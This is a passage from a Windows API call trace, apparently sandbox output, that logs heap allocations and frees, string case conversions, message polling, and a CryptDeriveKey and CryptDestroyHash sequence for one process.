(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.437] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.437] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.437] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.437] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.437] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.438] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.438] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.438] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.438] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.438] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.439] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0265.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0265.442] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.443] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0265.443] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.443] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.444] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.444] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.445] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.445] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.445] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.445] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.445] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.446] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0265.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0265.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.447] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0265.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0265.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.448] CryptDestroyHash (hHash=0xaa5760) returned 1 [0265.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0265.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 